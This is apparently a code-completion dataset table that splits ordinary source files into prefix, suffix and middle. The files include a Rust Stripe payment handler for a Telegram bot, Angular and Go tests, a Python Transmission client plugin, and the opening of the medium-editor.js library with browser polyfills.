file_name | prefix | suffix | middle
---|---|---|---|
payments.rs | use crate::db;
use crate::is_test;
use crate::models::{NewPayment, Payment, UpdateUser};
use crate::stripe_types::*;
use crate::telegram_types::SuccessfulPayment;
use chrono::{Duration, Utc};
use diesel::pg::data_types::PgTimestamp;
use diesel::pg::types::money::PgMoney;
use reqwest::blocking::Client;
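/// Handles a successful Telegram payment end-to-end: persists it locally,
/// then, if Stripe's pending balance covers the charge's net amount, creates
/// and confirms a PaymentIntent that transfers the money onwards.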
pub fn pay(
successful_payment: &SuccessfulPayment,
conn: db::UserDbConn,
) -> Result<(), reqwest::Error> {
// The user has successfully paid, so record that fact
let payment = persist_payment(successful_payment, &conn);
let stripe_token_str = if is_test() {
"STRIPE_TOKEN_TEST"
} else | ;
let stripe_token = std::env::var(stripe_token_str).unwrap();
let client = Client::builder().build()?;
let balance = get_balance(&client, &stripe_token)?;
let pending_amount = balance.pending.first().unwrap().amount;
let charge = get_charge_by_payment(&successful_payment, &client, &stripe_token)?;
let transfer_amount = charge.balance_transaction.net;
// Check the current pending balance to be sure the transfer amount is covered
if pending_amount > transfer_amount {
let payment_intent = payment_intent_request(&client, &stripe_token, transfer_amount)?;
let confirm_payment = confirm_payment(&payment_intent.id, &client, &stripe_token);
match confirm_payment {
Ok(confirmed) => set_transfer_id_on_payment(payment.id, &confirmed.id, &conn),
Err(e) => eprintln!("Payment could not be transferred. Err: {}", e),
}
let reduced_balance = get_balance(&client, &stripe_token)?;
let pending_amount_reduced = reduced_balance.pending.first().unwrap().amount;
if pending_amount_reduced != pending_amount - transfer_amount {
println!(
"reduced_balance {:?} is NOT EQUAL to pending_amount {:?} - transfer_amount {:?}",
pending_amount_reduced, pending_amount, transfer_amount
);
}
}
Ok(())
}
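/// Persists the payment and resets the user's running totals and drink count.
/// The two-hour offset on `last_paid` appears to be a fixed UTC+2 timezone
/// adjustment.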
fn persist_payment(successful_payment: &SuccessfulPayment, conn: &db::UserDbConn) -> Payment {
let payload = successful_payment.get_payload();
let last_paid = (Utc::now() + Duration::hours(2)).timestamp();
let new_last_total = payload.total;
let total = payload.totals_sum + new_last_total;
let mut update_user = UpdateUser::default();
update_user.last_paid = Some(PgTimestamp(last_paid));
update_user.last_total = Some(PgMoney(new_last_total));
update_user.total = Some(PgMoney(total));
update_user.drink_count = Some(0);
db::update_user(payload.user_id, &update_user, &conn);
let new_payment = NewPayment {
user_id: payload.user_id,
receipt_identifier: &successful_payment.provider_payment_charge_id,
payed_amount: PgMoney(payload.total),
payed_at: PgTimestamp(last_paid),
};
db::save_payment(new_payment, &conn)
}
fn payment_intent_request(
client: &Client,
token: &str,
amount: i32,
) -> Result<PaymentIntent, reqwest::Error> {
let destination_account = std::env::var("DESTINATION").unwrap();
let payment_intent_forminfo = &[
("payment_method_types[]", "card"),
("amount", &amount.to_string()),
("currency", "eur"),
("transfer_data[destination]", &destination_account),
];
client
.post("https://api.stripe.com/v1/payment_intents")
.bearer_auth(&token)
.form(payment_intent_forminfo)
.send()?
.json::<PaymentIntent>()
}
fn confirm_payment(
payment_id: &str,
client: &Client,
token: &str,
) -> Result<PaymentConfirmation, reqwest::Error> {
let confirm_payment_endpoint = format!(
"https://api.stripe.com/v1/payment_intents/{}/confirm",
payment_id
);
client
.post(&confirm_payment_endpoint)
.bearer_auth(&token)
// TODO: Use actual card-information
.form(&[("payment_method", "pm_card_visa")])
.send()?
.json::<PaymentConfirmation>()
}
pub fn get_balance(client: &Client, token: &str) -> Result<Balance, reqwest::Error> {
client
.get("https://api.stripe.com/v1/balance")
.bearer_auth(token)
.send()?
.json::<Balance>()
}
pub fn get_charge_by_payment(
successful_payment: &SuccessfulPayment,
client: &Client,
token: &str,
) -> Result<ChargeResponse, reqwest::Error> {
let charge_endpoint = format!(
"https://api.stripe.com/v1/charges/{}",
successful_payment.provider_payment_charge_id
);
client
.get(&charge_endpoint)
.bearer_auth(token)
.form(&[("expand[]", "balance_transaction")])
.send()?
.json::<ChargeResponse>()
}
fn set_transfer_id_on_payment(payment_id: i32, transfer_id: &str, conn: &db::UserDbConn) {
db::save_transfer_id(payment_id, transfer_id, conn);
}
// Helpers
pub fn money_in_eur(money: i64) -> f32 {
money as f32 / 100.00
}
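// Approximates Stripe's per-transaction fee: a percentage of the amount plus
// a fixed EUR 0.25 component; the percentage used differs between test and
// live mode.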
pub fn calc_stripe_fee(damage: i64) -> i32 {
let fee_percentage = if is_test() { 0.029 } else { 0.014 };
let fee_fix_amount = 0.25;
let raw_damage = money_in_eur(damage);
let total_damage = raw_damage * fee_percentage + fee_fix_amount;
(total_damage * 100_f32) as i32
}
| {
"STRIPE_TOKEN"
} |
request-manager-modal.component.spec.ts | import { async, ComponentFixture, TestBed } from '@angular/core/testing';
import { RequestManagerModalComponent } from './request-manager-modal.component'; |
beforeEach(async(() => {
TestBed.configureTestingModule({
declarations: [ RequestManagerModalComponent ]
})
.compileComponents();
}));
beforeEach(() => {
fixture = TestBed.createComponent(RequestManagerModalComponent);
component = fixture.componentInstance;
fixture.detectChanges();
});
it('should create', () => {
expect(component).toBeTruthy();
});
}); |
describe('RequestManagerModalComponent', () => {
let component: RequestManagerModalComponent;
let fixture: ComponentFixture<RequestManagerModalComponent>; |
support.rs | pub fn test_init() { | let _ = flexi_logger::Logger::with_str("info").start();
} | |
video_repository_test.go | package repositories_test
import (
"github.com/google/uuid"
"github.com/stretchr/testify/require"
"github.com/tonnytg/encoder-video-go/application/repositories"
"github.com/tonnytg/encoder-video-go/domain"
"github.com/tonnytg/encoder-video-go/framework/database"
"testing"
"time"
)
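// Inserts a video through the repository and asserts it can be found again
// by its generated ID.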
func | (t *testing.T) {
db := database.NewDbTest()
defer db.Close()
video := domain.NewVideo()
video.ID = uuid.New().String()
video.FilePath = "path"
video.CreateAt = time.Now()
repo := repositories.VideoRepositoryDb{Db: db}
repo.Insert(video)
v, err := repo.Find(video.ID)
require.NotEmpty(t, v.ID)
require.Nil(t, err)
require.Equal(t, v.ID, video.ID)
}
| TestVideoRepositoryDbInsert |
transmission.py | import six
import transmissionrpc
from pytz import reference, utc
from sqlalchemy import Column, Integer, String
from monitorrent.db import Base, DBSession
from monitorrent.plugin_managers import register_plugin
import base64
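# ORM model holding the Transmission RPC connection settings (a single row).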
class TransmissionCredentials(Base):
__tablename__ = "transmission_credentials"
id = Column(Integer, primary_key=True)
host = Column(String, nullable=False)
port = Column(Integer, nullable=False)
username = Column(String, nullable=True)
password = Column(String, nullable=True)
class TransmissionClientPlugin(object):
name = "transmission"
form = [{
'type': 'row',
'content': [{
'type': 'text',
'label': 'Host',
'model': 'host',
'flex': 80
}, {
'type': 'text',
'label': 'Port',
'model': 'port',
'flex': 20
}]
}, {
'type': 'row',
'content': [{
'type': 'text',
'label': 'Username',
'model': 'username',
'flex': 50
}, {
'type': 'password',
'label': 'Password',
'model': 'password',
'flex': 50
}]
}]
DEFAULT_PORT = 9091
SUPPORTED_FIELDS = ['download_dir']
def get_settings(self):
with DBSession() as db:
cred = db.query(TransmissionCredentials).first()
if not cred:
return None
return {'host': cred.host, 'port': cred.port, 'username': cred.username}
def set_settings(self, settings):
with DBSession() as db:
cred = db.query(TransmissionCredentials).first()
if not cred:
cred = TransmissionCredentials()
db.add(cred)
cred.host = settings['host']
cred.port = settings.get('port', self.DEFAULT_PORT)
cred.username = settings.get('username', None)
cred.password = settings.get('password', None)
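# Builds a transmissionrpc.Client from the stored credentials; returns False
# when no credentials have been saved.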
def check_connection(self):
with DBSession() as db:
cred = db.query(TransmissionCredentials).first()
if not cred:
return False
client = transmissionrpc.Client(address=cred.host, port=cred.port,
user=cred.username, password=cred.password)
return client
def find_torrent(self, torrent_hash):
client = self.check_connection()
if not client:
return False
try:
torrent = client.get_torrent(torrent_hash.lower(), ['id', 'hashString', 'addedDate', 'name'])
return {
"name": torrent.name,
"date_added": torrent.date_added.replace(tzinfo=reference.LocalTimezone()).astimezone(utc)
}
except KeyError:
return False
def get_download_dir(self):
client = self.check_connection()
if not client:
return None
session = client.get_session()
return six.text_type(session.download_dir)
def add_torrent(self, torrent, torrent_settings):
"""
:type torrent: str
:type torrent_settings: clients.TopicSettings | None
"""
client = self.check_connection()
if not client:
return False
torrent_settings_dict = {}
if torrent_settings is not None:
if torrent_settings.download_dir is not None:
torrent_settings_dict['download_dir'] = torrent_settings.download_dir
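# Transmission's RPC API expects the raw .torrent content base64-encoded.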
client.add_torrent(base64.b64encode(torrent).decode('utf-8'), **torrent_settings_dict)
return True
def remove_torrent(self, torrent_hash):
client = self.check_connection()
if not client:
return False
client.remove_torrent(torrent_hash.lower(), delete_data=False)
return True | register_plugin('client', 'transmission', TransmissionClientPlugin()) | |
default_type_clause.rs | use crate::{FormatElement, FormatResult, Formatter, ToFormatElement};
use rslint_parser::{ast::TsDefaultTypeClause, AstNode};
impl ToFormatElement for TsDefaultTypeClause {
fn | (&self, formatter: &Formatter) -> FormatResult<FormatElement> {
Ok(formatter.format_verbatim(self.syntax()))
}
}
| to_format_element |
medium-editor.js | /*global self, document, DOMException */
/*! @source http://purl.eligrey.com/github/classList.js/blob/master/classList.js */
// Full polyfill for browsers with no classList support
if (!("classList" in document.createElement("_"))) {
(function (view) {
"use strict";
if (!('Element' in view)) return;
var
classListProp = "classList"
, protoProp = "prototype"
, elemCtrProto = view.Element[protoProp]
, objCtr = Object
, strTrim = String[protoProp].trim || function () {
return this.replace(/^\s+|\s+$/g, "");
}
, arrIndexOf = Array[protoProp].indexOf || function (item) {
var
i = 0
, len = this.length
;
for (; i < len; i++) {
if (i in this && this[i] === item) {
return i;
}
}
return -1;
}
// Vendors: please allow content code to instantiate DOMExceptions
, DOMEx = function (type, message) {
this.name = type;
this.code = DOMException[type];
this.message = message;
}
, checkTokenAndGetIndex = function (classList, token) {
if (token === "") {
throw new DOMEx(
"SYNTAX_ERR"
, "An invalid or illegal string was specified"
);
}
if (/\s/.test(token)) {
throw new DOMEx(
"INVALID_CHARACTER_ERR"
, "String contains an invalid character"
);
}
return arrIndexOf.call(classList, token);
}
, ClassList = function (elem) {
var
trimmedClasses = strTrim.call(elem.getAttribute("class") || "")
, classes = trimmedClasses ? trimmedClasses.split(/\s+/) : []
, i = 0
, len = classes.length
;
for (; i < len; i++) {
this.push(classes[i]);
}
this._updateClassName = function () {
elem.setAttribute("class", this.toString());
};
}
, classListProto = ClassList[protoProp] = []
, classListGetter = function () {
return new ClassList(this);
}
;
// Most DOMException implementations don't allow calling DOMException's toString()
// on non-DOMExceptions. Error's toString() is sufficient here.
DOMEx[protoProp] = Error[protoProp];
classListProto.item = function (i) {
return this[i] || null;
};
classListProto.contains = function (token) {
token += "";
return checkTokenAndGetIndex(this, token) !== -1;
};
classListProto.add = function () {
var
tokens = arguments
, i = 0
, l = tokens.length
, token
, updated = false
;
do {
token = tokens[i] + "";
if (checkTokenAndGetIndex(this, token) === -1) {
this.push(token);
updated = true;
}
}
while (++i < l);
if (updated) {
this._updateClassName();
}
};
classListProto.remove = function () {
var
tokens = arguments
, i = 0
, l = tokens.length
, token
, updated = false
, index
;
do {
token = tokens[i] + "";
index = checkTokenAndGetIndex(this, token);
while (index !== -1) {
this.splice(index, 1);
updated = true;
index = checkTokenAndGetIndex(this, token);
}
}
while (++i < l);
if (updated) {
this._updateClassName();
}
};
classListProto.toggle = function (token, force) {
token += "";
var
result = this.contains(token)
, method = result ?
force !== true && "remove"
:
force !== false && "add"
;
if (method) {
this[method](token);
}
if (force === true || force === false) {
return force;
} else {
return !result;
}
};
classListProto.toString = function () {
return this.join(" ");
};
if (objCtr.defineProperty) {
var classListPropDesc = {
get: classListGetter
, enumerable: true
, configurable: true
};
try {
objCtr.defineProperty(elemCtrProto, classListProp, classListPropDesc);
} catch (ex) { // IE 8 doesn't support enumerable:true
if (ex.number === -0x7FF5EC54) {
classListPropDesc.enumerable = false;
objCtr.defineProperty(elemCtrProto, classListProp, classListPropDesc);
}
}
} else if (objCtr[protoProp].__defineGetter__) {
elemCtrProto.__defineGetter__(classListProp, classListGetter);
}
}(self));
}
/* Blob.js
* A Blob implementation.
* 2014-07-24
*
* By Eli Grey, http://eligrey.com
* By Devin Samarin, https://github.com/dsamarin
* License: X11/MIT
* See https://github.com/eligrey/Blob.js/blob/master/LICENSE.md
*/
/*global self, unescape */
/*jslint bitwise: true, regexp: true, confusion: true, es5: true, vars: true, white: true,
plusplus: true */
/*! @source http://purl.eligrey.com/github/Blob.js/blob/master/Blob.js */
(function (view) {
"use strict";
view.URL = view.URL || view.webkitURL;
if (view.Blob && view.URL) {
try {
new Blob;
return;
} catch (e) {}
}
// Internally we use a BlobBuilder implementation to base Blob off of
// in order to support older browsers that only have BlobBuilder
var BlobBuilder = view.BlobBuilder || view.WebKitBlobBuilder || view.MozBlobBuilder || (function(view) {
var
get_class = function(object) {
return Object.prototype.toString.call(object).match(/^\[object\s(.*)\]$/)[1];
}
, FakeBlobBuilder = function BlobBuilder() {
this.data = [];
}
, FakeBlob = function Blob(data, type, encoding) {
this.data = data;
this.size = data.length;
this.type = type;
this.encoding = encoding;
}
, FBB_proto = FakeBlobBuilder.prototype
, FB_proto = FakeBlob.prototype
, FileReaderSync = view.FileReaderSync
, FileException = function(type) {
this.code = this[this.name = type];
}
, file_ex_codes = (
"NOT_FOUND_ERR SECURITY_ERR ABORT_ERR NOT_READABLE_ERR ENCODING_ERR "
+ "NO_MODIFICATION_ALLOWED_ERR INVALID_STATE_ERR SYNTAX_ERR"
).split(" ")
, file_ex_code = file_ex_codes.length
, real_URL = view.URL || view.webkitURL || view
, real_create_object_URL = real_URL.createObjectURL
, real_revoke_object_URL = real_URL.revokeObjectURL
, URL = real_URL
, btoa = view.btoa
, atob = view.atob
, ArrayBuffer = view.ArrayBuffer
, Uint8Array = view.Uint8Array
, origin = /^[\w-]+:\/*\[?[\w\.:-]+\]?(?::[0-9]+)?/
;
FakeBlob.fake = FB_proto.fake = true;
while (file_ex_code--) {
FileException.prototype[file_ex_codes[file_ex_code]] = file_ex_code + 1;
}
// Polyfill URL
if (!real_URL.createObjectURL) {
URL = view.URL = function(uri) {
var
uri_info = document.createElementNS("http://www.w3.org/1999/xhtml", "a")
, uri_origin
;
uri_info.href = uri;
if (!("origin" in uri_info)) {
if (uri_info.protocol.toLowerCase() === "data:") {
uri_info.origin = null;
} else {
uri_origin = uri.match(origin);
uri_info.origin = uri_origin && uri_origin[1];
}
}
return uri_info;
};
}
URL.createObjectURL = function(blob) {
var
type = blob.type
, data_URI_header
;
if (type === null) {
type = "application/octet-stream";
}
if (blob instanceof FakeBlob) {
data_URI_header = "data:" + type;
if (blob.encoding === "base64") {
return data_URI_header + ";base64," + blob.data;
} else if (blob.encoding === "URI") {
return data_URI_header + "," + decodeURIComponent(blob.data);
} if (btoa) {
return data_URI_header + ";base64," + btoa(blob.data);
} else {
return data_URI_header + "," + encodeURIComponent(blob.data);
}
} else if (real_create_object_URL) {
return real_create_object_URL.call(real_URL, blob);
}
};
URL.revokeObjectURL = function(object_URL) {
if (object_URL.substring(0, 5) !== "data:" && real_revoke_object_URL) {
real_revoke_object_URL.call(real_URL, object_URL);
}
};
FBB_proto.append = function(data/*, endings*/) {
var bb = this.data;
// decode data to a binary string
if (Uint8Array && (data instanceof ArrayBuffer || data instanceof Uint8Array)) {
var
str = ""
, buf = new Uint8Array(data)
, i = 0
, buf_len = buf.length
;
for (; i < buf_len; i++) {
str += String.fromCharCode(buf[i]);
}
bb.push(str);
} else if (get_class(data) === "Blob" || get_class(data) === "File") {
if (FileReaderSync) {
var fr = new FileReaderSync;
bb.push(fr.readAsBinaryString(data));
} else {
// async FileReader won't work as BlobBuilder is sync
throw new FileException("NOT_READABLE_ERR");
}
} else if (data instanceof FakeBlob) {
if (data.encoding === "base64" && atob) {
bb.push(atob(data.data));
} else if (data.encoding === "URI") {
bb.push(decodeURIComponent(data.data));
} else if (data.encoding === "raw") {
bb.push(data.data);
}
} else {
if (typeof data !== "string") {
data += ""; // convert unsupported types to strings
}
// decode UTF-16 to binary string
bb.push(unescape(encodeURIComponent(data)));
}
};
FBB_proto.getBlob = function(type) {
if (!arguments.length) {
type = null;
}
return new FakeBlob(this.data.join(""), type, "raw");
};
FBB_proto.toString = function() {
return "[object BlobBuilder]";
};
FB_proto.slice = function(start, end, type) {
var args = arguments.length;
if (args < 3) {
type = null;
}
return new FakeBlob(
this.data.slice(start, args > 1 ? end : this.data.length)
, type
, this.encoding
);
};
FB_proto.toString = function() {
return "[object Blob]";
};
FB_proto.close = function() {
this.size = 0;
delete this.data;
};
return FakeBlobBuilder;
}(view));
view.Blob = function(blobParts, options) {
var type = options ? (options.type || "") : "";
var builder = new BlobBuilder();
if (blobParts) {
for (var i = 0, len = blobParts.length; i < len; i++) {
if (Uint8Array && blobParts[i] instanceof Uint8Array) {
builder.append(blobParts[i].buffer);
}
else {
builder.append(blobParts[i]);
}
}
}
var blob = builder.getBlob(type);
if (!blob.slice && blob.webkitSlice) {
blob.slice = blob.webkitSlice;
}
return blob;
};
var getPrototypeOf = Object.getPrototypeOf || function(object) {
return object.__proto__;
};
view.Blob.prototype = getPrototypeOf(new view.Blob());
}(typeof self !== "undefined" && self || typeof window !== "undefined" && window || this.content || this));
(function (root, factory) {
'use strict';
if (typeof module === 'object') {
module.exports = factory;
} else if (typeof define === 'function' && define.amd) {
define(function () {
return factory;
});
} else {
root.MediumEditor = factory;
}
}(this, function () {
'use strict';
var Util;
(function (window) {
'use strict';
// Params: Array, Boolean, Object
function getProp(parts, create, context) {
if (!context) {
context = window;
}
try {
for (var i = 0; i < parts.length; i++) {
var p = parts[i];
if (!(p in context)) {
if (create) {
context[p] = {};
} else {
return;
}
}
context = context[p];
}
return context;
} catch (e) {
// 'p in context' throws an exception when context is a number, boolean, etc. rather than an object,
// so in that corner case just return undefined (by having no return statement)
}
}
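// Shallow-copies own properties from each source object into dest; when
// 'overwrite' is false, keys already present on dest are preserved.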
function copyInto(overwrite, dest) {
var prop,
sources = Array.prototype.slice.call(arguments, 2);
dest = dest || {};
for (var i = 0; i < sources.length; i++) {
var source = sources[i];
if (source) {
for (prop in source) {
if (source.hasOwnProperty(prop) &&
typeof source[prop] !== 'undefined' &&
(overwrite || dest.hasOwnProperty(prop) === false)) {
dest[prop] = source[prop];
}
}
}
}
return dest;
}
Util = {
// http://stackoverflow.com/questions/17907445/how-to-detect-ie11#comment30165888_17907562
// by rg89
isIE: ((navigator.appName === 'Microsoft Internet Explorer') || ((navigator.appName === 'Netscape') && (new RegExp('Trident/.*rv:([0-9]{1,}[.0-9]{0,})').exec(navigator.userAgent) !== null))),
// https://github.com/jashkenas/underscore
keyCode: {
BACKSPACE: 8,
TAB: 9,
ENTER: 13,
ESCAPE: 27,
SPACE: 32,
DELETE: 46
},
parentElements: ['p', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'blockquote', 'pre'],
extend: function extend(/* dest, source1, source2, ...*/) {
var args = [true].concat(Array.prototype.slice.call(arguments));
return copyInto.apply(this, args);
},
defaults: function defaults(/*dest, source1, source2, ...*/) {
var args = [false].concat(Array.prototype.slice.call(arguments));
return copyInto.apply(this, args);
},
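// Classic prototype-chain inheritance: derived inherits from base while
// keeping any methods already defined on its own prototype.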
derives: function derives(base, derived) {
var origPrototype = derived.prototype;
function Proto() { }
Proto.prototype = base.prototype;
derived.prototype = new Proto();
derived.prototype.constructor = base;
derived.prototype = copyInto(false, derived.prototype, origPrototype);
return derived;
},
// Find the next node in the DOM tree that represents any text that is being
// displayed directly next to the targetNode (passed as an argument)
// Text that appears directly next to the current node can be:
// - A sibling text node
// - A descendant of a sibling element
// - A sibling text node of an ancestor
// - A descendant of a sibling element of an ancestor
findAdjacentTextNodeWithContent: function findAdjacentTextNodeWithContent(rootNode, targetNode, ownerDocument) {
var pastTarget = false,
nextNode,
nodeIterator = ownerDocument.createNodeIterator(rootNode, NodeFilter.SHOW_TEXT, null, false);
// Use a native NodeIterator to iterate over all the text nodes that are descendants
// of the rootNode. Once past the targetNode, choose the first non-empty text node
nextNode = nodeIterator.nextNode();
while (nextNode) {
if (nextNode === targetNode) {
pastTarget = true;
} else if (pastTarget) {
if (nextNode.nodeType === 3 && nextNode.nodeValue && nextNode.nodeValue.trim().length > 0) {
break;
}
}
nextNode = nodeIterator.nextNode();
}
return nextNode;
},
isDescendant: function isDescendant(parent, child, checkEquality) {
if (!parent || !child) {
return false;
}
if (checkEquality && parent === child) {
return true;
}
var node = child.parentNode;
while (node !== null) {
if (node === parent) {
return true;
}
node = node.parentNode;
}
return false;
},
// https://github.com/jashkenas/underscore
isElement: function isElement(obj) {
return !!(obj && obj.nodeType === 1);
},
now: Date.now,
// https://github.com/jashkenas/underscore
throttle: function (func, wait) {
var THROTTLE_INTERVAL = 50,
context,
args,
result,
timeout = null,
previous = 0,
later = function () {
previous = Date.now();
timeout = null;
result = func.apply(context, args);
if (!timeout) {
context = args = null;
}
};
if (!wait && wait !== 0) {
wait = THROTTLE_INTERVAL;
}
return function () {
var now = Date.now(),
remaining = wait - (now - previous);
context = this;
args = arguments;
if (remaining <= 0 || remaining > wait) {
if (timeout) {
clearTimeout(timeout);
timeout = null;
}
previous = now;
result = func.apply(context, args);
if (!timeout) {
context = args = null;
}
} else if (!timeout) {
timeout = setTimeout(later, remaining);
}
return result;
};
},
traverseUp: function (current, testElementFunction) {
if (!current) {
return false;
}
do {
if (current.nodeType === 1) {
if (testElementFunction(current)) {
return current;
}
// do not traverse upwards past the nearest containing editor
if (current.getAttribute('data-medium-element')) {
return false;
}
}
current = current.parentNode;
} while (current);
return false;
},
htmlEntities: function (str) {
// converts special characters (like <) into their escaped/encoded values (like &lt;).
// This allows you to display the string without the browser reading it as HTML.
return String(str).replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
},
// http://stackoverflow.com/questions/6690752/insert-html-at-caret-in-a-contenteditable-div
insertHTMLCommand: function (doc, html) {
var selection, range, el, fragment, node, lastNode, toReplace;
if (doc.queryCommandSupported('insertHTML')) {
try {
return doc.execCommand('insertHTML', false, html);
} catch (ignore) {}
}
selection = doc.defaultView.getSelection();
if (selection.getRangeAt && selection.rangeCount) {
range = selection.getRangeAt(0);
toReplace = range.commonAncestorContainer;
// Ensure range covers maximum amount of nodes as possible
// By moving up the DOM and selecting ancestors whose only child is the range
if ((toReplace.nodeType === 3 && toReplace.nodeValue === range.toString()) ||
(toReplace.nodeType !== 3 && toReplace.innerHTML === range.toString())) {
while (toReplace.parentNode &&
toReplace.parentNode.childNodes.length === 1 &&
!toReplace.parentNode.getAttribute('data-medium-element')) {
toReplace = toReplace.parentNode;
}
range.selectNode(toReplace);
}
range.deleteContents();
el = doc.createElement('div');
el.innerHTML = html;
fragment = doc.createDocumentFragment();
while (el.firstChild) {
node = el.firstChild;
lastNode = fragment.appendChild(node);
}
range.insertNode(fragment);
// Preserve the selection:
if (lastNode) {
range = range.cloneRange();
range.setStartAfter(lastNode);
range.collapse(true);
selection.removeAllRanges();
selection.addRange(range);
}
}
},
getSelectionRange: function (ownerDocument) {
var selection = ownerDocument.getSelection();
if (selection.rangeCount === 0) {
return null;
}
return selection.getRangeAt(0);
},
// http://stackoverflow.com/questions/1197401/how-can-i-get-the-element-the-caret-is-in-with-javascript-when-using-contentedi
// by You
getSelectionStart: function (ownerDocument) {
var node = ownerDocument.getSelection().anchorNode,
startNode = (node && node.nodeType === 3 ? node.parentNode : node);
return startNode;
},
getSelectionData: function (el) {
var tagName;
if (el && el.tagName) {
tagName = el.tagName.toLowerCase();
}
while (el && this.parentElements.indexOf(tagName) === -1) {
el = el.parentNode;
if (el && el.tagName) {
tagName = el.tagName.toLowerCase();
}
}
return {
el: el,
tagName: tagName
};
},
execFormatBlock: function (doc, tagName) {
var selectionData = this.getSelectionData(this.getSelectionStart(doc));
// FF handles blockquote differently on formatBlock
// allowing nesting, we need to use outdent
// https://developer.mozilla.org/en-US/docs/Rich-Text_Editing_in_Mozilla
if (tagName === 'blockquote' && selectionData.el &&
selectionData.el.parentNode.tagName.toLowerCase() === 'blockquote') {
return doc.execCommand('outdent', false, null);
}
if (selectionData.tagName === tagName) {
tagName = 'p';
}
// When IE we need to add <> to heading elements and
// blockquote needs to be called as indent
// http://stackoverflow.com/questions/10741831/execcommand-formatblock-headings-in-ie
// http://stackoverflow.com/questions/1816223/rich-text-editor-with-blockquote-function/1821777#1821777
if (this.isIE) {
if (tagName === 'blockquote') {
return doc.execCommand('indent', false, tagName);
}
tagName = '<' + tagName + '>';
}
return doc.execCommand('formatBlock', false, tagName);
},
// TODO: not sure if this should be here
setTargetBlank: function (el) {
var i;
if (el.tagName.toLowerCase() === 'a') {
el.target = '_blank';
} else {
el = el.getElementsByTagName('a');
for (i = 0; i < el.length; i += 1) {
el[i].target = '_blank';
}
}
},
addClassToAnchors: function (el, buttonClass) {
var classes = buttonClass.split(' '),
i,
j;
if (el.tagName.toLowerCase() === 'a') {
for (j = 0; j < classes.length; j += 1) {
el.classList.add(classes[j]);
}
} else {
el = el.getElementsByTagName('a');
for (i = 0; i < el.length; i += 1) {
for (j = 0; j < classes.length; j += 1) {
el[i].classList.add(classes[j]);
}
}
}
},
isListItem: function (node) {
if (!node) {
return false;
}
if (node.tagName.toLowerCase() === 'li') {
return true;
}
var parentNode = node.parentNode,
tagName = parentNode.tagName.toLowerCase();
while (this.parentElements.indexOf(tagName) === -1 && tagName !== 'div') {
if (tagName === 'li') {
return true;
}
parentNode = parentNode.parentNode;
if (parentNode && parentNode.tagName) {
tagName = parentNode.tagName.toLowerCase();
} else {
return false;
}
}
return false;
},
cleanListDOM: function (element) {
if (element.tagName.toLowerCase() === 'li') {
var list = element.parentElement;
if (list.parentElement.tagName.toLowerCase() === 'p') { // yes we need to clean up
this.unwrapElement(list.parentElement);
}
}
},
unwrapElement: function (element) {
var parent = element.parentNode,
current = element.firstChild,
next;
do {
next = current.nextSibling;
parent.insertBefore(current, element);
current = next;
} while (current);
parent.removeChild(element);
},
warn: function () {
if (window.console !== undefined && typeof window.console.warn === 'function') {
window.console.warn.apply(console, arguments);
}
},
deprecated: function (oldName, newName, version) {
// simple deprecation warning mechanism.
var m = oldName + ' is deprecated, please use ' + newName + ' instead.';
if (version) {
m += ' Will be removed in ' + version;
}
Util.warn(m);
},
deprecatedMethod: function (oldName, newName, args, version) {
// run the replacement and warn when someone calls a deprecated method
Util.deprecated(oldName, newName, version);
if (typeof this[newName] === 'function') {
this[newName].apply(this, args);
}
},
cleanupAttrs: function (el, attrs) {
attrs.forEach(function (attr) {
el.removeAttribute(attr);
});
},
cleanupTags: function (el, tags) {
tags.forEach(function (tag) {
if (el.tagName.toLowerCase() === tag) {
el.parentNode.removeChild(el);
}
}, this);
},
getClosestTag: function (el, tag) { // get the closest parent
return Util.traverseUp(el, function (element) {
return element.tagName.toLowerCase() === tag.toLowerCase();
});
},
unwrap: function (el, doc) {
var fragment = doc.createDocumentFragment();
for (var i = 0; i < el.childNodes.length; i++) {
fragment.appendChild(el.childNodes[i]);
}
if (fragment.childNodes.length) {
el.parentNode.replaceChild(fragment, el);
} else {
el.parentNode.removeChild(el);
}
},
setObject: function (name, value, context) {
// summary:
// Set a property from a dot-separated string, such as 'A.B.C'
var parts = name.split('.'),
p = parts.pop(),
obj = getProp(parts, true, context);
return obj && p ? (obj[p] = value) : undefined; // Object
},
getObject: function (name, create, context) {
// summary:
// Get a property from a dot-separated string, such as 'A.B.C'
return getProp(name ? name.split('.') : [], create, context); // Object
}
};
}(window));
var ButtonsData;
(function () {
'use strict';
ButtonsData = {
'bold': {
name: 'bold',
action: 'bold',
aria: 'bold',
tagNames: ['b', 'strong'],
style: {
prop: 'font-weight',
value: '700|bold'
},
useQueryState: true,
contentDefault: '<b>B</b>',
contentFA: '<i class="fa fa-bold"></i>',
key: 'b'
},
'italic': {
name: 'italic',
action: 'italic',
aria: 'italic',
tagNames: ['i', 'em'],
style: {
prop: 'font-style',
value: 'italic'
},
useQueryState: true,
contentDefault: '<b><i>I</i></b>',
contentFA: '<i class="fa fa-italic"></i>',
key: 'i'
},
'underline': {
name: 'underline',
action: 'underline',
aria: 'underline',
tagNames: ['u'],
style: {
prop: 'text-decoration',
value: 'underline'
},
useQueryState: true,
contentDefault: '<b><u>U</u></b>',
contentFA: '<i class="fa fa-underline"></i>',
key: 'u'
},
'strikethrough': {
name: 'strikethrough',
action: 'strikethrough',
aria: 'strike through',
tagNames: ['strike'],
style: {
prop: 'text-decoration',
value: 'line-through'
},
useQueryState: true,
contentDefault: '<s>A</s>',
contentFA: '<i class="fa fa-strikethrough"></i>'
},
'superscript': {
name: 'superscript',
action: 'superscript',
aria: 'superscript',
tagNames: ['sup'],
/* firefox doesn't behave the way we want it to, so we CAN'T use queryCommandState for superscript
https://github.com/guardian/scribe/blob/master/BROWSERINCONSISTENCIES.md#documentquerycommandstate */
// useQueryState: true
contentDefault: '<b>x<sup>1</sup></b>',
contentFA: '<i class="fa fa-superscript"></i>'
},
'subscript': {
name: 'subscript',
action: 'subscript',
aria: 'subscript',
tagNames: ['sub'],
/* firefox doesn't behave the way we want it to, so we CAN'T use queryCommandState for subscript
https://github.com/guardian/scribe/blob/master/BROWSERINCONSISTENCIES.md#documentquerycommandstate */
// useQueryState: true
contentDefault: '<b>x<sub>1</sub></b>',
contentFA: '<i class="fa fa-subscript"></i>'
},
'image': {
name: 'image',
action: 'image',
aria: 'image',
tagNames: ['img'],
contentDefault: '<b>image</b>',
contentFA: '<i class="fa fa-picture-o"></i>'
},
'quote': {
name: 'quote',
action: 'append-blockquote',
aria: 'blockquote',
tagNames: ['blockquote'],
contentDefault: '<b>“</b>',
contentFA: '<i class="fa fa-quote-right"></i>'
},
'orderedlist': {
